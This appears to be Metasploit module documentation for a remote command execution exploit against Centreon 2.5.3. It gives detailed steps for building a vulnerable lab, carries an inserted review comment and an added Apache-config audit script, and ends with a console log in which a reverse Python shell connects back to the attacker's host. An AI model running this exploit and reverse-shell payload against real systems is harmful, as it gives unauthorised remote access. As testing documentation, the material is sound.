## Vulnerable Application

1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Creating a testing environment for this application involves many steps, so I have documented the process here.

  1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was `centreon`.
  2. Install php5.6 (see [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04))
```
sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
# At the package configuration prompts: select OK, then select No Configuration
sudo apt-get install snmp-mibs-downloader
```
  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
```
sudo a2enmod php5.6
sudo a2dismod php7.0
```
  4. Restart apache with `sudo apache2ctl restart`
  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html), starting at step 6 of that guide. The plugins link there is broken; use [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
```
wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install
```
  5.1 If `make` fails with an SSLv3 method not found error, apply the following patch (from the [Nagios support forum](https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)):
```
--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
@@ -70,8 +70,13 @@
#endif
      break;
   case 3: /* SSLv3 protocol */
+#if defined(OPENSSL_NO_SSL3)
+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
+      return STATE_CRITICAL;
+#else
      method = SSLv3_client_method();
      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
+#endif
      break;
   default: /* Unsupported */
      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
```
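
Review bot: the added `printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));` in the `OPENSSL_NO_SSL3` branch wraps its arguments in a second pair of parentheses, so the comma operator discards `"%s\n"` and the translated message itself becomes the format string, printed without a trailing newline. Drop the extra parentheses so the call has the same shape as the one in the `default:` case, `printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));`.
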
  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install
```
  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html), but only the command-line portion.
```
sudo mkdir /var/log/centreon-engine
cd ~
sudo pear install XML_RPC-1.4.5
# may need to install php-xml
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
# Answers to the installer prompts, in order:
  <enter>
  q
  y
  y
  y
  y
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  <enter>
  <enter>
  centreon
  <enter>
  /var/log/centreon-engine
  /home/centreon/nagios-plugins-2.1.1/plugins
  <enter>
  /etc/init.d/centengine
  /usr/local/bin/centengine
  /usr/local/etc/
  /usr/local/etc/
  /etc/init.d/centengine
  <enter>
  y
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y
  <enter>
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y
```
  10. Fix the Apache config (copy it to `conf-available` and convert the access rules to Apache 2.4 syntax)
```
sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload
```
  11. Configure via the website. Browse to `http://<ip>/centreon`
```
next
next
select centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/bin/centenginestats
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  next
select centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/cbmod.so
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  next
Pick whatever details about your user you want, next
Fill in the MySQL root password, next
next
next
finish
```
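
A check for step 10, added here as an example and not part of the original write-up: it runs that step's two `sed` substitutions over a constructed Apache 2.2-style config (an assumption, not the real `centreon.conf`) and counts the 2.2 access directives left behind, since Apache directive names are case-insensitive but the `sed` patterns are not. The hypothetical helper `convert_24` also takes a `Require` argument such as `ip 192.168.2.0/24`, so the deliberately vulnerable lab host can be limited to the lab subnet instead of `all granted`.

```shell
#!/bin/sh
# Added example: audit the Apache 2.2 -> 2.4 conversion from step 10.

# Constructed Apache 2.2-style sample (an assumption, NOT the real centreon.conf).
sample_conf() {
cat <<'EOF'
Alias /centreon /usr/local/centreon/www/
<Directory "/usr/local/centreon/www">
    Options Indexes
    AllowOverride AuthConfig Options
    Order allow,deny
    Allow from all
</Directory>
EOF
}

# The two case-sensitive substitutions from step 10, applied to stdin.
step10_convert() {
    sed -e 's/Order allow,deny/Require all granted/' -e 's/allow from all//'
}

# Hypothetical helper: case-insensitive conversion of stdin. Replaces the
# Order line with "Require <arg>" (default "all granted") and drops
# Allow/Deny lines. Pass e.g. "ip 192.168.2.0/24" to limit access to a subnet.
convert_24() {
    awk -v req="${1:-all granted}" '
        { l = tolower($0) }
        l ~ /^[ \t]*order[ \t]/ { sub(/[^ \t].*/, "Require " req); print; next }
        l ~ /^[ \t]*(allow|deny)[ \t]+from[ \t]/ { next }
        { print }'
}

# Count Apache 2.2 access-control directives still present on stdin.
legacy_count() {
    grep -ciE '^[[:space:]]*(order|allow|deny|satisfy)[[:space:]]' || true
}

echo "2.2 directives left by step 10 sed: $(sample_conf | step10_convert | legacy_count)"
echo "2.2 directives left by convert_24:  $(sample_conf | convert_24 'ip 192.168.2.0/24' | legacy_count)"
```

To audit the real file, run `legacy_count < /etc/apache2/conf-available/centreon.conf`; a result of 0 means no 2.2 access directives remain.
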
## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/linux/http/centreon_useralias_exec`
  4. Do: `set payload`
  5. Do: `set rhost`
  6. Do: `check`
  7. Do: `run`
  8. You should get a shell.

## Scenarios

Just a standard run.
```
    msf > use exploit/linux/http/centreon_useralias_exec
    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
    payload => cmd/unix/reverse_python
    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
    rhost => 192.168.2.85
    msf exploit(centreon_useralias_exec) > set verbose true
    verbose => true
    msf exploit(centreon_useralias_exec) > check
    [+] Version Detected: 2.5.3
    [*] 192.168.2.85:80 The target appears to be vulnerable.
    msf exploit(centreon_useralias_exec) > exploit
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending malicious login
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
    whoami
    www-data
    uname -a
    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
